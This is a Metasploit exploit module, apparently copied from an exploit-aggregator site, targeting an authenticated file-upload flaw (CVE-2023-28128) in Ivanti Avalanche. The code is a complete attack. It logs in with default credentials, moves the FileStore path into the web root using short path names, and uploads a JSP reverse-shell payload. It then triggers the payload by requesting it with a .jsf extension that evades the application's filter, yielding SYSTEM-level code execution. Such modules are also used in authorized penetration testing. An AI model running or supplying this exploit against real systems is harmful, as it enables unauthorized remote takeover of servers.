Share
## https://sploitus.com/exploit?id=1337DAY-ID-38682
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',
        'Description' => %q{
          Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short
          names in the configuration path for the Central FileStore. Because of
          this, an administrator can change the default path to the web root
          of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Piotr Bazydlo', # @chudypb - Vulnerability Discovery
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],
          ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],
          ['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],
          ['CVE', '2023-28128']
        ],
        'Platform' => ['win', 'java'],
        'Privileged' => true,
        'Arch' => ARCH_JAVA,
        'Targets' => [
          [ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]
        ],
        'DisclosureDate' => '2023-04-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('USERNAME', [ true, 'User name to log in with', 'amcadmin' ]),
        OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),
        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])
      ]
    )
  end

  def check
    # Cleanup should not be needed after doing just a check.
    @cleanup_needed = false

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
      'method' => 'GET'
    )

    return CheckCode::Unknown('Failed to receive a response from the application') unless res

    unless res.body.include?('Avalanche - User Login')
      return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')
    end

    html = res.get_html_document
    elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }
    return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem

    version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)
    return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2

    version = version[1]
    vprint_status("Version of Ivanti Avalanche appears to be v#{version}")
    ver_no = Rex::Version.new(version)
    patched_version = Rex::Version.new('6.4.0.186')

    if ver_no >= patched_version
      CheckCode::Safe('Target has been patched!')
    elsif ver_no < patched_version
      CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')
    else
      CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")
    end
  end

  def authenticate
    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?
      fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')
    end

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')

    html = res.get_html_document
    view_state = get_view_state(html)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'loginForm' => 'loginForm',
        'j_idt8' => '',
        'loginField' => datastore['USERNAME'],
        'passwordField' => datastore['PASSWORD'],
        'TextCaptchaAnswer' => '',
        'javax.faces.ViewState' => view_state,
        'loginTableButton' => 'loginTableButton'
      }
    )

    unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')
      fail_with(Failure::UnexpectedReply, 'Login failed')
    end
  end

  def get_view_state(html)
    view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text

    view_state
  end

  def configure_filestore
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first
      fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')
    end

    html = res.get_html_document
    view_state = get_view_state(html)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state

    @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text
    fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path
    print_status("Original FileStore config path: '#{@original_config_path}'")

    # determine drive letter
    drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3
    drive_letter = drive_letter[1]

    new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"
    print_status("Changing FileStore config path to '#{new_config_path}'")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
        'formFileStoreConfig' => 'formFileStoreConfig',
        'txtUncPath' => new_config_path,
        'txtVelocityFolder' => '',
        'javax.faces.ViewState' => view_state
      }
    )

    input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first
    if input_field_html.blank?
      fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')
    elsif input_field_html[:value] != new_config_path
      fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')
    end
  end

  def get_directory_val(res, dir_name)
    html = res.get_html_document
    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results

    expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }
    fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir
    data_rk = expand_dir.at('@data-rk')&.value
    fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk

    data_rk
  end

  def expand_folder(data_rk, view_state)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
        'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',
        'fileStoreTree_dlgFileStoreTree_expand' => data_rk,
        'javax.faces.ViewState' => view_state
      }
    )
  end

  def select_folder(data_rk, view_state)
    @cleanup_needed = true
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' =>
      {
        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
        'javax.faces.behavior.event' => 'select',
        'javax.faces.partial.event' => 'select',
        'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,
        'form_filestore_tree' => 'form_filestore_tree',
        'fileStoreTree_dlgFileStoreTree_selection' => data_rk,
        'javax.faces.ViewState' => view_state
      }
    )
  end

  def upload_payload
    payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
    # need to 'select' webapps/AvalancheWeb to upload a file
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first
    web_data_rk = get_directory_val(res, 'webapps')
    view_state = get_view_state(res.get_html_document)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state

    res = expand_folder(web_data_rk, view_state)
    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res
    avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')
    view_state = get_view_state(res.get_html_document)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state
    res = select_folder(avalanche_data_rk, view_state)
    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res

    view_state = get_view_state(res.get_html_document)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state

    boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"

    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"
    post_data << "upload-form\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"
    post_data << "#{view_state}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"
    post_data << "true\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"
    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"javax.faces.source\"\r\n\r\n"
    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"
    post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"
    post_data << "Content-Type: application/octet-stream\r\n\r\n"
    post_data << "#{payload.encoded}\r\n"
    post_data << "--#{boundary}--\r\n"

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'data' => post_data,
      'headers' => {
        'Accept' => 'application/xml, text/xml, */*; q=0.01',
        'Faces-Request' => 'partial/ajax',
        'X-RequestedWith' => 'XMLHttpRequest',
        'Content-Type' => "multipart/form-data; boundary=#{boundary}",
        'Accept-Encoding' => 'gzip, deflate'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")

    print_good("Successfully uploaded '#{payload_name}'")
    payload_name
  end

  def cleanup
    if @cleanup_needed == false
      return
    end

    restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'
    print_status('Attempting to restore config path')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    unless res
      print_error("Could not access FileStore config. #{restore_msg}")
      return
    end

    html = res.get_html_document
    view_state = get_view_state(html)
    unless view_state
      print_error("Failed to get view state. #{restore_msg}")
      return
    end

    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
        'formFileStoreConfig' => 'formFileStoreConfig',
        'txtUncPath' => @original_config_path,
        'txtVelocityFolder' => '',
        'javax.faces.ViewState' => view_state
      }
    )

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
      'method' => 'GET',
      'keep_cookies' => true
    )

    unless res&.body&.include?(@original_config_path)
      print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")
      return
    end

    print_good('Successfully restored the FileStore config path')
  end

  def exploit
    # Starting off we shouldn't need cleanup, however if we get to the point were we start
    # to change config settings then we will need to clean that up.
    @cleanup_needed = false

    authenticate
    configure_filestore
    payload_name = upload_payload

    register_file_for_cleanup("webapps/#{payload_name}")
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet
      'method' => 'GET',
      'keep_cookies' => true
    )
  end
end